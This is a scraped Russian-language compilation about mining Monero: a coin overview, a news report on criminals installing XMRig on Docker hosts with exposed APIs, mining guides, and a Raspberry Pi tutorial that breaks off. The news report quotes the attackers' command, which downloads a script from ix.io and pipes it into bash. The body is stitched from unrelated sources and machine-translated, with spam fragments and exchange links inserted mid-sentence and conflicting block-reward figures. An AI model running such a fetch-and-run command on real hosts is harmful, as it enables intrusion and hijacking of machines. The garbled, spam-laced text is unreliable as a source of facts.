На чем майнить xmr: How to Mine Monero | Alexandria

Содержание

Криптовалюта Monero (XMR), обзор, цена, прогноз, перспективы 2022, отзывы, график, где торгуется

Что такое Monero?

Monero (XMR) — это частная, безопасная и не отслеживаемая криптовалюта, запущенная 18 апреля 2014 года как форк ByteCoin. Monero создан быть непроницаемым и максимально конфиденциальным, при этом построен на блокчейне и на открытом исходном коде. Заявляется, что пользователь в нем целиком распоряжается своими активами их приватностью, поскольку никто больше не может наблюдать чужие балансы или транзакции.

Monero удается быть конфиденциальной криптовалютой благодаря кольцевым подписям и скрытым адресам. Кольцевая подпись — это анонимная цифровая подпись, которая не раскрывает, кто подписал транзакцию. Они генерируются на платформе Monero комбинацией ключей отправителя и открытых ключей в блокчейне. Скрытые адреса — это случайно сгенерированные адреса, которые создаются во время каждой транзакции для одноразового использования и скрывают адрес назначения транзакции вместе с личностью получателя.

Кольцевые конфиденциальные транзакции (RingCT) также скрывают сумму транзакции; эта функция была добавлена в январе 2017 года как обязательная функция для всех транзакций в сети Monero.

В основе Monero протокол CryptoNote с динамическими, в отличие от Bitcoin, размерами блока и комиссии.

Как майнить Monero?

Майнить Monero можно в одиночку или присоединившись к майнинговому пулу. В отличие от Bitcoin и некоторых других криптовалют на основе proof-of-work, для майнинга Monero не требуются специализированные интегральные схемы (ASIC), хоть он и тоже основан на proof-of-work алгоритме. Майнить Monero можно на любом процессоре или видеокарте, на Windows, Mac, Linux и Android, потому что алгоритм майнинга Monero направлен на поддержку «маленьких» узлов.

Один из популярных майнеров Monero, Coinhive, был закрыт в марте 2019 года. Сервис предоставлял созданный им скрипт майнинга Monero в качестве альтернативы рекламе для сайтов. Процессор посетителей веб-сайта нагружался майнингом Monero, а сайт получал процент от майнинга и мог обойтись без показа рекламы.

Как пользоваться Monero?

Пользоваться Monero можно как обычной криптовалютой, но при этом наслаждаясь высоким уровнем анонимности и конфиденциальности.

Преступники майнят Monero на уязвимых Docker-системах

Преступники майнят Monero на уязвимых Docker-системах

Alexander Antipov

Злоумышленники взламывают Docker-системы с доступными в Сети API.

Некая киберпреступная группировка проводит массовое сканирование интернета на предмета Docker-систем с доступными в Сети API. Злоумышленники отправляют команды Docker-системам и размещают майнеры криптовалюты Monero. Вредоносная кампания началась 24 ноября и сразу же стала заметной из-за своего масштаба.

«Пользователи могут заметить, что подобные атаки на открытые Docker-системы не являются чем-то новым и происходят довольно часто.

Отличительной чертой данной кампании был большой рост активности сканирования», — сообщил соучредитель компании Bad Packets Трой Марш (Troy Mursch).

По словам исследователей из Bad Packets, группа, осуществляющая данные атаки, в настоящее время сканирует более 59 тыс. IP-сетей (сетевых блоков) в поисках открытых Docker-систем. После обнаружения уязвимого хоста, злоумышленники используют API для запуска контейнера ОС Alpine Linux, где они запускают команду chroot/mnt/bin/sh -c’curl-sL4 http:// ix.io / 1XQa | bash. Она загружает и запускает скрипт Bash с сервера злоумышленников, который устанавливает классический майнер криптовалюты XMRRig. По словам Марша, за два дня с момента начала кампании преступники уже добыли 14,82 Monero (XMR) на общую сумму чуть более $740.

Эксперты также обнаружили, что преступники не только отключают защитные решения, но завершают все процессы, связанные с конкурирующими майнерами криптовалюты, такими как DDG. Как отмечается, вредоносный скрипт также содержит функцию сканирования зараженного хоста на наличие файлов rConfig. При обнаружении данные файлы шифруются и отправляются на C&C-сервер злоумышленников. Преступники также создают бэкдор на взломанных контейнерах и оставляют SSH-ключи для более легкого доступа и удаленного контроля зараженных хостов.

Эксперты рекомендуют пользователям Docker проверить, доступны ли в Сети их API, закрыть порты и удалить нераспознанные контейнеры.


В нашем телеграм канале мы рассказываем о главных новостях из мира IT, актуальных угрозах и событиях, которые оказывают влияние на обороноспособность стран, бизнес глобальных корпораций и безопасность пользователей по всему миру. Узнай первым как выжить в цифровом кошмаре!
Поделиться новостью:

Как и на чем майнить Monero в 2021 году?

Содержание статьи:

Monero (XMR) — это монета с открытым исходным кодом, созданная в апреле 2014 года. Она ориентирована на конфиденциальность, децентрализацию и масштабируемость. Новые XMR добываются майнингом, и их количество будет расти, пока в обращение не поступит 18,4 миллиона монет.

Как и в случае с любой другой криптовалютой однозначного ответа нет. Прибыльность зависит от затрат на электроэнергию, стоимости оборудования оборудование и текущего хешрейта.

При выходе на бычий рынок цена на XMR растет, и майнить его выгодно. 

Вознаграждение за вычисленный блок Monero отличается от вознаграждения за биткойн. В отличие от установленной платы за блок ВТС, которая уменьшается вдвое каждые четыре года, награда за генерацию новых XMR снижается постепенно.

Текущее вознаграждение за блок составляет около 1,65 XMR, а новый блок добывается примерно раз в 2 минуты. Вы можете отследить величину среднесуточной оплаты здесь.

У Monero есть еще одна интересная особенность, которая отличает его от ВТС. В сообществе майнеров биткойна есть обеспокоенность, что, поскольку вознаграждение за блок постоянно сокращается вдвое, майнеры-одиночки будут выходить из шахты. В этом случае безопасность окажется под угрозой, ведь получить заветный 51% сети организованному пулу станет проще.

У анонимной криптовалюты есть решение этой проблемы. Согласно MoneroOutreach.org «ставка вознаграждения будет неуклонно снижаться до конца мая 2022 года, когда в обращении будет 18,132 миллиона XMR, после чего вознаграждение за блок в размере 0,6 XMR будет оставаться неопределенно долго».

Таким образом, Moнеро примет на себя небольшую инфляцию, чтобы гарантировать, что всегда есть запас безопасности. 

Лучшее место для проверки хешрейта Monero — BitInfoCharts.

Если посмотреть на долгосрочные графики хешрейта Monero, можно заметить почти мгновенное его падение на 50% или более. Это результат частых хард-форков.

Команда разработчиков Monero регулярно вводят изменения в код криптовалюты, чтобы препятствовать работе ASIC в сети (ASIC — это мощные устройства для майнинга, которые используются централизованными пулами)

Команда разработчиков меняет алгоритм хеширования, наряду с другими изменениями, чтобы сделать добычу монет доступной для частных лиц.  

К сожалению, одним из важных факторов, влияющих на хешрейт Monero, является захват ботнета . То есть вирусы заражают компьютеры и заставляют их добывать криптовалюту без ведома владельца.

Это проблема уникальная для Monero, так как монета в основном добывается на рабочих ПК, а не на ASIC.

Для тех, кто занимается майнингом XMR на своем компьютере с небольшим набором процессоров, безусловно, лучшее время для майнинга — сразу после одного из хард-форков этой сети. 

Учитывая, что дата вилки известна заранее, есть возможность спланировать начало добычи заранее.

Количество ботнетов, которые в настоящее время работают на Монерo, тоже оказывает влияние на прибыльность. Чем больше зараженных ПК вовлечены в процесс майнинга, тем труднее находить новый блок.

  

Есть много процессоров, которые можно использовать для добычи. Мы сравним три из них, начиная с самого мощного, AMD EPYC 7742 .

1. EPYC 7742. Этот поистине эпический процессор с 64 ядрами способен выдавать невероятные 44 000 H / s. Во время работы он потребляет около 225 Вт энергии.

Хотя EPYC 7742 является самым продуктивным процессором на рынке, его мощность имеет свою цену. В настоящее время он продается на Amazon за $7000. Оборудование последнего поколения нередко продается со значительной наценкой. Вот почему для начинающего шахтера имеет смысл приобрести что-то попроще.

2. AMD Ryzen Threadripper 3970X. Имеет 32 ядра и стоит $ 1900 на Amazon. Он может майнить со скоростью 28 000 H / s при потребляемой мощности 200 Вт.

Хотя вы можете получить высокий хешрейт за меньшие деньги, объединив два Threadrippers против одного EPYC 7742, обратная сторона заключается в том, что потребление электроэнергии составит 400 Вт вместо 225.

3. AMD Ryzen 5 3600. Это самый дешевый процессор для добычи XMR в нашем списке. Он развивает 7900 H / s, потребляет 65 Вт и стоит всего $175.

Для тех, кто только начинает заниматься майнингом, Ryzen 5 станет отличным выбором, поскольку он позволит настроить свою ферму и подобрать комфортные условия работы. Обновить свое оборудование можно позже, как только принципы майнинга станут понятны.

Есть несколько разных способов оценить, сколько можно заработать в этой сфере. Одним из ресурсов является MoneroHash.

MoneroHash — один из старейших майнинговых пулов. У них есть подробная статистика прибыльности, частоты нахождения блока и т. д.

Еще можно использовать специальный калькулятор майнинга на WhatToMine.com. 

Чтобы точно определить возможность получения дохода, необходимо просчитать свои затраты на оборудование, электроэнергию, комиссию пулу (например MoneroHash взимает 1,6%), а также ввести среднюю цену монеты.

Также необходимо знать хешрейт оборудования, и, выставив эти данные, можно принимать решение о возможности добычи на этом блокчейне.

Один из вариантов — использовать официальный кошелек, но его загрузка может занять много времени.

Альтернативой является хранение добытых монет и наград на Exodus. Это мультивалютное хранилище, позволяющее использовать XMR сразу после пополнения.  

Вот лишь некоторые из самых популярных функций Exodus:

 • поддержка более 100 криптоактивов;

 • премиальный дизайн и простота использования;

 • возможность обменивать одни активы на другие через кошелек без создания учетной записи;

 • поддержка лучших децентрализованных приложений, таких как Compound Finance;

 • возможность получения пассивного крипто-дохода;

 • функция синхронизации кошелька с ПК и мобильным телефоном;

 • оперативная техподдержка 24/7.

Обратите внимание, что вознаграждение за майнинг на EXODUS лучше отправлять большими порциями и / или реже. Это предотвратит возникновение проблем при одновременной отправке множества мелких сумм.

Подписывайтесь на ForkNews в Telegram, чтобы всегда оставаться в курсе последних новостей из мира криптовалют 

Как майнить Monero | Александрия

Эта статья была обновлена ​​26 августа 2021 г. и теперь содержит самую свежую информацию об алгоритме Monero RandomX и майнинге на ЦП.

Monero (XMR) — это сомнительная монета, обеспечивающая конфиденциальность, которая, несмотря на усиление нормативного давления на биржи, остается среди 30 лучших монет в индустрии криптовалют. В настоящее время рыночная капитализация криптовалюты составляет более 5 миллиардов долларов. XMR использует тот же механизм консенсуса PoW, что и Биткойн, с той разницей, что его реализация позволяет даже майнерам-любителям с обычным процессором получить часть прибыли. пирог.Примечательно, что разработчики XMR прилагают все усилия, чтобы поддерживать и улучшать децентрализацию сети, удерживая специализированные машины, такие как специализированные интегральные схемы (ASIC), подальше от места добычи полезных ископаемых. Таким образом, больше людей могут справедливо разделить более 17 миллионов монет. Предыдущее использование Monero алгоритма хеширования CryptNight было заменено в ноябре 2019 года, когда запланированное обновление представило RandomX, алгоритм PoW, который также препятствует разработке ASIC. RandomX также начал наказывать майнеров Monero, которые использовали графические процессоры, а это означает, что майнинг на CPU теперь является лучшим способом майнить Monero.

Присоединяйтесь к нам в демонстрации криптовалютной революции, по одному информационному бюллетеню за раз. Подпишитесь сейчас, чтобы получать ежедневные новости и обновления рынка прямо на ваш почтовый ящик вместе с миллионами наших подписчиков (правильно, миллионы нас любят!) — чего вы ждете? Майнинг

Monero — это процесс проверки транзакций в блокчейне криптовалюты для получения вознаграждения в виде монет XMR. Вы должны отметить, что криптовалюта работает аналогично Биткойну, за исключением того, что она больше ориентирована на облегчение частных транзакций.Майнинг XMR — это когда вы создаете новые монеты на децентрализованной платформе с помощью программного обеспечения для майнинга Monero.

Как работает майнинг XMR

В отличие от Биткойна, у которого есть фиксированный запас в 21 миллион монет, монета, ориентированная на конфиденциальность, не имеет аналогичного жесткого ограничения. Вместо этого он настроен таким образом, что если майнеры обнаружат все выделенные 18,132 миллиона токенов, то «хвостовая эмиссия» начнет бесконечно генерировать 0,6 XMR вознаграждения, начиная с мая 2022 года. Это поддерживает мотивацию майнеров после исчерпания общего предложения. .

Новый блок на децентрализованной платформе обнаруживается примерно каждые две минуты, а текущее вознаграждение за блок по состоянию на январь 2021 года составляет 1,26 XMR.

На что следует обратить внимание, прежде чем начать майнить Monero

Прибыльность Monero

Майнинг — это бизнес; Следовательно, прибыльность майнинга Monero должна сыграть роль еще до того, как вы даже подумаете о приобретении необходимого оборудования. Чтобы определить, является ли майнинг Monero прибыльным, вы должны принять во внимание хешрейт оборудования для майнинга, затраты на электроэнергию и предоставленную плату за обслуживание пула.Ключевым фактором, повышающим прибыльность майнеров XMR, является то, что для этого процесса не требуются дорогостоящие сверхмощные приспособления, как в Биткойне. Даже с простым процессором или графическим процессором все в порядке.

Калькулятор майнинга XMR
В соответствии с этим вы должны использовать калькулятор доходности майнинга XMR, чтобы рассчитать, позволяют ли хэш-мощность ваших устройств, потребляемая мощность, стоимость электроэнергии и т. Д. Получать прибыль.

Использование калькулятора майнинга XMR означает простую настройку значений хешрейта майнинга или выбор одного из аппаратных устройств майнинга Monero, перечисленных в списке майнеров Monero.Информация о майнинге Monero постоянно обновляется вместе с текущей информацией о майнинге блоков.

Hash Rate

Майнинг — это соревнование, основанное на времени. Следовательно, чем выше скорость обработки устройства, тем удачнее и веселее будет процесс майнинга. И, как указывалось ранее, Monero использует тот же механизм консенсуса, что и Биткойн, хотя и с другим алгоритмом хеширования.

Чтобы уточнить, BTC использует SHA-256, а Monero использует RandomX. Два алгоритма хеширования вызывают разницу в поддерживаемых устройствах для майнинга.Хотя производители ASIC предприняли много попыток нанести удар по криптовалюте, ориентированной на конфиденциальность, команде XRM удалось выполнить итерацию обновлений анти-ASIC достаточно раз, чтобы держать эти устройства в страхе.

Зачем отгонять ASIC? Из-за их стоимости их могут себе позволить лишь немногие избранные, что ведет к централизации майнеров, а значит, перевешивает видение децентрализации криптосообщества в глазах разработчиков Monero.

Хешрейт — это мера скорости устройств для майнинга криптовалюты.Проще говоря, это количество хэшей или вычислений, которые устройство может обрабатывать в секунду. Термин «майнер Monero» может относиться либо к физическому майнеру, работающему с устройствами для майнинга, либо к программам, установленным для майнинга ориентированной на конфиденциальность монеты с использованием процессоров, начиная с RandomX Обновить.

Также это может означать программное обеспечение для майнинга Monero, которое мы обсуждали в предыдущем разделе. В этой статье воспользуемся первым значением в списке. Чтобы майнить XMR, вам нужно превратить ваше обычное оборудование для майнинга в майнинговую установку Monero.

Установка для майнинга Monero

Поскольку сейчас майнинг Monero в основном осуществляется исключительно с помощью центральных процессоров, вы можете либо использовать свой текущий процессор, либо приобрести новый только для майнинга Monero.

После того, как вы определились с процессором, который вы будете использовать для майнинга Monero, вам нужно будет загрузить программное обеспечение Monero.

Лучшее оборудование для майнинга Monero

Программное обеспечение для майнинга Monero — это приложение, которое помогает вам подключить оборудование для майнинга к блокчейну или пулу монеты. Разные процессоры поддерживают разное программное обеспечение для майнинга.Обратите внимание, что использование несовместимого программного обеспечения означает, что процессоры будут реветь, но без вознаграждения.

Популярное оборудование для майнинга XRM включает:
  1. AMD Threadripper 3990X
  2. AMD Ryzen 9 3900X
  3. Intel Core i9-10900K
Вы можете узнать, как ваше оборудование работает по сравнению с другими, чтобы понять, подходит ли оно для майнинг с использованием теста майнинга RandomX Monero.
Лучшее программное обеспечение для майнинга Monero

Есть несколько вариантов программного обеспечения для майнинга.Для соло-майнинга можно использовать кошелек с интерфейсом или графическим интерфейсом, но только с процессором. Для майнинга с использованием пула или графического процессора потребуется специальное программное обеспечение. Ниже приведены некоторые майнеры, которые поддерживают майнинг Monero, но обратите внимание, что некоторые взимают плату с разработчиков.

Популярное программное обеспечение для майнинга XRM включает в себя:
  1. XMRig

  2. CSminer

Имейте в виду, что программное и аппаратное обеспечение для майнинга — быстроразвивающаяся отрасль, и эти возможности могут меняться со временем.

Вы можете майнить монету, ориентированную на конфиденциальность, тремя способами:

  • как одиночный майнер XMR;
  • присоединение к пулу Monero;
  • с использованием сервисов облачного майнинга Monero.

Соло-майнер

Соло-майнер — это майнер, который напрямую взаимодействует с блокчейном. Самым значительным преимуществом соло-майнера является то, что майнер получает все награды за блоки. К сожалению, соло-майнеры могут не так часто получать награды, как майнинговые пулы.

Еще одним преимуществом соло-майнинга является то, что это можно делать на вашем ПК.

Майнинг-пулы Monero

Майнинг-пул XMR включает отдельных владельцев буровых установок, которые объединяют мощность своих буровых установок, чтобы увеличить свои шансы на обнаружение новых блоков в цепочке блоков Monero.Награды за блоки получают те, кто внес свой вклад в поиск определенного блока. Большинство пулов XRM взимают комиссию от 0% до 2%. Некоторыми популярными пулами для майнинга Monero являются MineXMR, SupportXMR, Unipool и XMRNanopool. Помимо проверки транзакций быстрее, чем в одиночку, присоединение к пулу майнинга XMR означает, что вознаграждения в основном стабильны. Преимущества пулов Monero заключаются в том, что вы будете получать частые выплаты в зависимости от того, сколько вы вносите в пул Monero по вашему выбору. Однако при майнинге в пулах Monero вам необходимо использовать стороннее программное обеспечение, что может отнять небольшую часть вашего дохода.Более того, слишком большое количество людей, занимающихся майнингом в пуле, может привести к тому, что у пула будет более 50% хешрейта, что опасно.

Однако использование пула Monero означает, что вы несете ответственность за обслуживание оборудования, подключение к Интернету и оплату счетов за электроэнергию. Обратите внимание, что выбор надежного пула идеален, потому что, хотя вы можете предоставлять свою хэш-мощность для пула, пул с сомнительной репутацией может не поддерживать свое соединение с блокчейном Monero.

Чтобы узнать больше о том, какие пулы Monero выбрать, перейдите по ссылке:
1. https://miningpoolstats.stream/monero2. https://pools.xmr.wiki/

Monero Cloud Mining

Облачный майнинг Monero — это процесс использования вычислительных мощностей, размещенных в облаке, для майнинга XMR. Часто поставщики услуг облачного майнинга управляют центрами обработки данных, в которых размещаются вычислительные устройства.

Физические лица платят за использование вычислительной мощности. Поскольку всю тяжелую работу берет на себя центр обработки данных, тем, кто пользуется услугой, не нужно вкладывать средства в оборудование и установки для майнинга. Облачный майнинг

Monero считается финансово жизнеспособным, если вы не являетесь майнером-одиночкой или поклонником майнинг-пула.Авторитетные поставщики услуг облачного майнинга XMR включают Minergate и CCGMining. Один из способов определить сомнительного поставщика услуг облачного майнинга — это посмотреть на количество подписчиков. Будьте осторожны, если число необычно мало. Есть ли у нас все необходимое, чтобы начать майнить XMR? Еще нет. Не хватает одного; адрес кошелька. Независимо от того, занимаетесь ли вы майнингом в одиночку или в пуле, адрес имеет важное значение, потому что именно по нему вы можете получить свои награды. Вы можете использовать кошелек с полным узлом или тот, который вы используете на своей любимой бирже криптовалют, такой как Binance и Coinbase.

Теперь, когда у нас есть все ингредиенты, пришло время настроить наше программное обеспечение для майнинга. Конфигурация включает использование программного обеспечения для майнинга для подключения оборудования к пулу или прямого подключения к блокчейну Monero.

Процесс настройки зависит от используемого оборудования и режима майнинга. Если процесс успешен, пора наблюдать, как эти награды начинают накапливаться.

Вот краткое изложение о том, как добывать Monero:
  1. Выберите свое оборудование;
  2. Выберите программное обеспечение для майнинга, которое поддерживает ваше оборудование для майнинга;
  3. Определите адрес, который вы будете использовать;
  4. Настроить ПО для майнинга;
  5. Устройтесь поудобнее и расслабьтесь; XMR уже в пути.
К сожалению, Monero пользуется большим спросом среди злоумышленников, таких как хакеры и мошенники, из-за анонимности, которую обеспечивают ее функции конфиденциальности. Следовательно, эти же преступники предпочитают не майнить XMR законным способом и не покупать его на биржах, а вместо этого заражают компьютеры пользователей Интернета через вредоносное программное обеспечение (вредоносное ПО), встроенное в электронные письма или взломанные веб-сайты. Эта вредоносная программа, в свою очередь, использует эти скомпрометированные компьютеры для тайного однорангового майнинга Monero, о чем никто не подозревает.По оценкам, 4% всей Monero добывается с помощью так называемых ботнетов, групп из тысяч взломанных компьютеров, вычислительная мощность которых увеличена для добычи криптовалюты без ведома их владельцев. По оценкам, за последние четыре года таким способом было добыто более 57 миллионов долларов XMR (по состоянию на январь 2019 года). Monero (и Биткойн) также являются предпочтительной криптовалютой для хакеров-вымогателей. Это неприемлемая ситуация для властей, поскольку эти средства распределяются между отмывателями денег, преступными группировками и террористическими организациями.Основные причины, по которым регулирующие органы принимают меры в отношении владения криптовалютой, заключаются в том, что они уполномочены обеспечивать защиту резидентов своей юрисдикции и, что более важно, глобальная группа разработки финансовых мер борьбы с отмыванием денег (FATF) по борьбе с отмыванием денег (AML) и борьба с ней -выполнены директивы по финансированию терроризма (ФТ).

Таким образом, они не могут закрывать глаза на это незаконное и нарушающее действие ПОД / ФТ поведение и оказывали давление на биржи, чтобы они удалили монеты конфиденциальности, такие как XMR. Многие ведущие биржи в Азии особенно поступили так в 2020 году.

Этот исключение из листинга влияет на стоимость Monero, и рекомендуется быть в курсе юридических аспектов майнинга Monero в 2021 году.

Майнинг XMR является одним из немногих прибыльных предприятий по добыче полезных ископаемых, которые не тратят деньги на приобретение горное оборудование. С вашим процессором или графическим процессором и инициативой все готово. Кроме того, возможность облачного майнинга избавляет от хлопот по созданию и обслуживанию буровой установки для тех, кто хочет избавиться от технических деталей, связанных с майнингом Monero.Это делает ее одной из самых простых для майнинга криптовалют и имеет более низкий барьер для входа.

Если цена Monero увеличивается, увеличивается и норма прибыли от майнинга, поскольку в этот процесс вкладывается меньше инвестиций, чем при майнинге биткойнов. Тем не менее, очень важно следить за мошенниками, особенно с облачным майнингом, а также с правилами конфиденциальности монет в вашей стране.

Эта статья содержит ссылки на сторонние веб-сайты или другой контент только в информационных целях («Сторонние сайты»).Сторонние сайты не находятся под контролем CoinMarketCap, и CoinMarketCap не несет ответственности за содержание любого Стороннего сайта, включая, помимо прочего, любую ссылку, содержащуюся на Стороннем сайте, или любые изменения или обновления Третьего сайта. Партия сайт. CoinMarketCap предоставляет вам эти ссылки только для удобства, и включение любой ссылки не означает одобрения, одобрения или рекомендации CoinMarketCap сайта или какой-либо связи с его операторами. Эта статья предназначена для использования и должна использоваться только в информационных целях.Важно провести собственное исследование и анализ, прежде чем принимать какие-либо существенные решения, связанные с описанными продуктами или услугами. Эта статья не предназначена и не должна толковаться как финансовая консультация. Взгляды и мнения, выраженные в этой статье, принадлежат автору [компании] и не обязательно отражают точку зрения CoinMarketCap.

Как майнить Monero — Funorte


Вы можете майнить, не присоединяясь к пулу, но вам будет сложно завершить блоки.Майнинг в пуле — лучший вариант, но всегда будет цена — ничего не дается бесплатно. Нет ничего, что мешало бы вам майнить Monero, это законно, но имейте в виду, что у вас может быть налог, который нужно уплатить с ваших доходов от майнинга, в зависимости от того, где вы живете. Стоит подумать о ваших ожиданиях в отношении майнинга XMR и о том, сколько денег вы можете инвестировать в капитальное оборудование.
Есть ли время по умолчанию, когда пул возвращает монету, или это зависит от пула? Мне нравится пробовать новые монеты / алгоритмы и просто бездельничать, но не хочу терять накопленный XMR, поскольку это моя основная монета по сравнению с моей.XMR Stak недавно выпустил обновление, которое позволяет пользователям просто загрузить один установщик независимо от оборудования, которое они планируют использовать.
Самая важная вещь, которую следует помнить, — это то, что секретные ключи и мнемонические семена должны храниться в секрете и никому не должны раскрываться. Неспособность защитить эту информацию может привести к полной и безвозвратной потере средств. Его легко настроить, и он предлагает упрощенный доступ Btcoin TOPS 34000 $ к основным функциям Monero — просто выберите «простой режим» после открытия приложения.Получайте ежедневные брифинги по криптовалюте и еженедельные отчеты о рынке биткойнов прямо на ваш почтовый ящик. Monero — одна из самых популярных монет конфиденциальности на рынке.

Как добывать Monero в качестве соло-копателя

был полезен для вас и поможет вам в ваших усилиях по добыче полезных ископаемых. Нажмите кнопку «Зарегистрироваться», а затем укажите действующий адрес электронной почты и надежный пароль.

Установите Monero Miner


Существует множество функций CryptoNight, о которых стоит задуматься.Самое главное, что скорость между процессором и используемыми модулями памяти важна для этого алгоритма хеширования, потому что он сильно ограничен памятью. В уникальном повороте к Monero каждая монета XMR может быть заменена другой монетой XMR, что https://www.binance.com/ означает, что Monero имеет реальное преимущество по сравнению с другими криптовалютами, такими как BTC. Что ж, многие люди могут добывать Monero с прибылью, и, занимаясь майнингом, вы можете быть уверены в постоянном потоке дохода, выплачиваемого каждый день. При майнинге XMR нет серьезных проблем с безопасностью, но вам нужно помнить о деталях.
Некоторые популярные пулы с высоким вознаграждением включают MineXMR, Monero Pool, Nanopool и Dwarfpool. Сегодня мы продолжим работу с Mine XMR, так как он имеет низкую плату и хорошее расположение серверов с минимальной задержкой. На изображении ниже показаны детали подключения Mine XMR в соответствии с тем, какой бонус Btc к USD мы вводим в приложение. Вот некоторое программное обеспечение и соответствующая конфигурация графического процессора, которые работают лучше всего. Для достижения наилучших результатов приобретите хорошую установку для майнинга на GPU. Официальный кошелек Monero — цифровой реестр ваших транзакций Monero и отслеживание ваших доходов.
Вы можете майнить 2 валюты одновременно без потери хешрейта для основной монеты, таким образом, вы получаете дополнительную прибыль. Имя пользователя — это адрес электронной почты вашей существующей учетной записи MinerGate. Он разработан для эффективного скрытия данных о подключении пользователя, таких как геолокация и IP-адрес. Это означает, что любой, у кого есть приличный компьютер или ноутбук, может успешно майнить Monero и получать на этом прибыль. Кроме того, процесс майнинга Monero намного более децентрализован и затрудняет получение большого количества хэш-мощности для человека или группы.

  • Причиной этого является реализация Monero алгоритма хеширования CryptoNight, который используется для майнинга ее токенов XMR.
  • Чтобы проверить, сколько Monero вы заработали за счет майнинга, введите адрес своего кошелька в поле «Поиск» на сайте майнинг-пула.
  • Этот вариант требует, чтобы вы использовали свои вычислительные ресурсы в составе группы майнеров, которые делятся добытыми токенами XMR между собой.
  • Акцент Monero на полномасштабной децентрализации распространяется и на подход к майнингу, который часто продвигается как более «демократичный» по сравнению, например, с подходом, применяемым в биткойнах.
  • Майнинг Monero работает несколько иначе, чем то, что, по вашему мнению, вы знаете о стандартном копании криптовалюты.
  • Я не ищу ничего, чтобы зарабатывать тысячи в день, просто для начала с довольно минимальным бюджетом.

работает намного лучше, чем Nvidia, в отношении майнинга Monero и алгоритма CryptoNight. Вам понадобится доступ к очень дешевой электроэнергии и классная среда майнинга Monero, чтобы получать прибыль с майнингом Monero. В прошлом Bitmain производила специализированные интегральные схемы для майнинга Cryptonight.
Как я упоминал ранее, вам не нужны специализированные ASIC для майнинга Monero. Но прежде чем продолжить, вам нужно знать два наиболее важных фактора при выборе оборудования. Соло-майнинг, как добывать монеро, не принесет вам никаких наград, если вы не готовы инвестировать много денег в оборудование для майнинга. Как я уже упоминал ранее, вам не нужно покупать специальное оборудование для майнинга XMR.

Лучшие криптовалюты, в которые можно играть в онлайн-казино

Если вам нужен графический пользовательский интерфейс, вы можете использовать графический интерфейс Monero Spelunker и начать работу сразу после создания кошелька. Обратите внимание, что официальный клиент обеспечивает загрузку около ГБ для хранения всей цепочки блоков Monero на вашем компьютере. Вот несколько основных советов, которые помогут сделать процесс майнинга на https://beaxy.com/ максимально гладким. Убедитесь, что ваш компьютер никогда не переходит в спящий режим. Это можно изменить, перейдя в раздел Power Setting. Еще один хороший совет — отключить автоматические обновления Windows, так как они иногда могут перезагрузить компьютер и нарушить весь процесс майнинга.
Драйверы легко доступны, программное обеспечение для настройки работает хорошо, а разгон довольно прост.Майнинг с использованием Windows с графическими процессорами — отличный выбор с приобретенной лицензией Windows, опытом работы в среде Windows и доступностью установки на основе графического интерфейса. После вычета затрат на электроэнергию и комиссию за майнинг конечная ежедневная прибыль от майнинга Monero составляет (1,65 доллара США) от Monero к доллару США. Сложность майнинга XMR составляет 206 691 406 008,00, хешрейт майнинга XMR составляет 4200,00 H / s, потребляя 900 Вт мощности по цене 0,10 доллара США за кВтч, а вознаграждение за блок составляет 2,15 XMR по цене 136,50 долларов США. Результаты рентабельности майнинга Monero и вознаграждения за майнинг были рассчитаны с использованием лучшего калькулятора майнинга XMR со следующими исходными данными.

Введите хешрейт майнинга Monero, энергопотребление в ваттах и ​​стоимость. Кошелек с графическим интерфейсом пользователя Monero также позволяет добывать монету в одиночку из приложения. Это простой способ майнить, но выплаты менее стабильны. Затем скопируйте данные о хешрейте и энергопотреблении в калькулятор майнинга CryptoCompare, чтобы оценить прибыль от майнинга. Тем не менее, обозреватели блоков Monero могут быть полезны для мониторинга информации в масштабе всей сети, такой как статистика майнинга, уровни выбросов, комиссии за транзакции и время блокировки.Тем не менее, данные об обозревателях блоков ограничены, потому что транзакции Monero являются частными.
Фон для майнера может быть выполнен с помощью screen или добавления & к команде. Теперь вы можете подождать, пока на ваших машинах накопится достаточно акций, чтобы их можно было считать, что Binance блокирует пользователей как достаточно большую долю выплаты в Monero на указанный вами кошелек. Ваш WALLET_ADDRESS вы получаете либо в графическом интерфейсе кошелька, либо в учетной записи mymonero.
Интересно, что в битве против ASIC последний форк Monero внес изменения в алгоритм CryptoNight, что означало, что с этого дня все существующие ASIC-установки стали бесполезными.Antiminer X3 китайской компании Bitmain был настолько мощным, что Monero сочла необходимым действовать. CryptoNight — это алгоритм хеширования, который позволяет пользователям майнить Monero.
Последние 39 месяцев мы с удовольствием работали над созданием сервиса, которого, по нашему мнению, заслуживает криптосообщество. Вам нужна учетная запись, чтобы отмечать монеты, отслеживать свое портфолио, настраивать оповещения, голосовать за монеты, а также использовать все другие расширенные функции. В этом руководстве мы попытались охватить все основы этой криптовалюты с поддержкой конфиденциальности, ее отличий, а также способы добычи криптовалюты Monero.Кроме того, проверьте, все ли настройки на вашем компьютере упорядочены, чтобы не мешать процессу майнинга. Теперь сверните блокнот, чтобы перейти к пулу, скопируйте и вставьте блок из примера, представленного на изображении.
Однако вы можете использовать калькулятор, чтобы определить, сколько вы можете заработать, а затем подумайте, стоит ли оно того для вас. Да, вы можете добывать XMR с помощью Raspberry Pi, но имейте в виду, что Pi недостаточно мощный, чтобы быстро решать блоки, поэтому просто невыгодно пытаться использовать Pi для добычи XMR.Просто нажмите «Рассчитать», чтобы рассчитать, сколько вы будете зарабатывать ежегодно или даже ежедневно.

Выберите подходящее оборудование

Вместо этого кошельки Monero показывают историю транзакций и имеют инструменты для проверки отдельных транзакций и проверки платежей. Используйте эти инструкции, как добывать Monero, чтобы подтверждать платежи непосредственно из графического интерфейса кошелька Monero. Кошельки обычно автоматически обрабатывают другую случайную ключевую и адресную информацию.

Как майнить XMR на Raspberry PI

См. Статью на моем сайте: https: // theoverpoweredpc.ml / how-to-mine-xmr-on-a-raspberry-pi /
У вас есть raspberry pi, и вы хотели бы майнить на нем monero? Вот как вы можете легко майнить xmr на Raspberry Pi. Это займет всего несколько минут.

Требования

Вам понадобится библиотека и инструменты для майнинга xmr на Raspberry Pi. Обратите внимание, что это Raspberry Pi, он не будет быстро майнить. Вам понадобится обновленный raspberry pi, а остальное будет установлено и загружено в процессе установки / настройки.

Обновление

Чтобы на вашем raspberry pi была установлена ​​последняя версия программного обеспечения для майнинга xmr, вам необходимо обновить все с помощью небольшой команды. Выполните следующую команду в терминале:

sudo apt-get update sudo apt-get upgrade sudo apt-get full-upgrade

По завершении убедитесь, что вы перезагрузились, если у вас было более 100 обновлений / обновлений. Как только все будет обновлено и готово к запуску майнинга, прочтите следующее ниже, чтобы установить майнер.

Зависимости

